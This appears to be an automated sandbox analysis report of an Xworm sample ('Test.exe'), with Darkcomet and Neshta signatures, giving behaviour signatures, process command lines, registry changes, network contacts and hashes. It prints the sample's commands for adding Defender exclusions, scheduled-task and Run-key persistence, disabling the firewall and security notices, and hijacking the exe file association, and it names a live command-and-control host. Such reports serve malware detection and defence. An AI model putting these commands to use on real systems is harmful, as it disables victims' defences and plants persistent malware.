Analysis Overview
| SHA256 | b7f8446df81a5d91809436661acf8ee4fdd1c897312a494ca01fca94f5352d5b |
| Threat Level | Known bad |
The file Test.exe was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Modifies WinLogon for persistence
Darkcomet
Modifies firewall policy service
Windows security bypass
Modifies visibility of file extensions in Explorer
Xworm family
Xworm
Detect Xworm Payload
Neshta
Detect Neshta payload
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Disables Task Manager via registry modification
Boot or Logon Autostart Execution: Active Setup
Executes dropped EXE
Modifies system executable filetype association
Reads user/profile data of web browsers
Windows security modification
Checks computer location settings
Uses the VBS compiler for execution
Drops startup file
Adds Run key to start application
Enumerates connected drives
Looks up external IP address via web service
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Modifies Control Panel
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Modifies Internet Explorer settings
Scheduled Task/Job: Scheduled Task
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
System policy modification
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Kills process with taskkill
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer start page
Modifies registry class
Analysis: static1
Detonation Overview
| Reported | 2024-07-15 09:12 |
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
| Submitted | 2024-07-15 09:12 |
| Reported | 2024-07-15 09:18 |
| Platform | win7-20240708-en |
| Max time kernel | 329s |
| Max time network | 318s |
| Command Line | |
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(8 identical rows, no detail recorded)
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\Test.exe | "C:\Users\Admin\AppData\Local\Temp\Test.exe" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe' |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Test.exe' |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe' |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' |
| C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe" |
| C:\Windows\system32\taskeng.exe | taskeng.exe {BC049129-3B35-443C-83BD-9395177DA58D} S-1-5-21-2958949473-3205530200-1453100116-1000:WHMFPZKA\Admin:Interactive:[1] |
| C:\Users\Admin\AppData\Roaming\svchost.exe (12 instances) | no command line recorded |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | edition-ages.gl.at.ply.gg | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 641a98ca640a5042ffb70741769cbcc4 |
| SHA1 | 09af0432501c2176b1cdcf1da7f8ac7d07576968 |
| SHA256 | 513c298584c491da25c7d98ad0906e9dca84b782d5315829deb2a213ad744c88 |
| SHA512 | 7b21cd67b7b16b988ff6780bd7833524972f166f9bb646bcbe6a03e50bfaf39709d517f858301e9e70623f2d7bf8c8bf74898d3a3403f8c15ac3b62f08f2abbf |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | f9cf3c741b2aab438659db28ff3dcade |
| SHA1 | abea5f0af31f38d2df86735b0ac57a508eb36b68 |
| SHA256 | b7f8446df81a5d91809436661acf8ee4fdd1c897312a494ca01fca94f5352d5b |
| SHA512 | ff86f97a2bb44b001367655afcbb33b928c07a5ec7ce0c9449d9997c4f2b0550363c5bbc8f0a3615dc7cd6aa9f04d018b81c1e98338575bed0910a20fcd9a6eb |
Analysis: behavioral2
Detonation Overview
| Submitted | 2024-07-15 09:12 |
| Reported | 2024-07-15 09:25 |
| Platform | win10v2004-20240709-en |
| Max time kernel | 696s |
| Max time network | 783s |
| Command Line | |
Signatures
Darkcomet
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(52 identical rows, no detail recorded)
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(3 identical rows, no detail recorded)
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\svñhost.exe" | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "0" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Neshta
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
Xworm
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\uzdixv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Executes dropped EXE
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Windows security modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\svñhost.exe" | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\svñhost.exe" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Dragon\\Desktop\\trollface1.jpg" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\Google\Update\DISABL~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\setup_wm.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\UNINST~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpconfig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
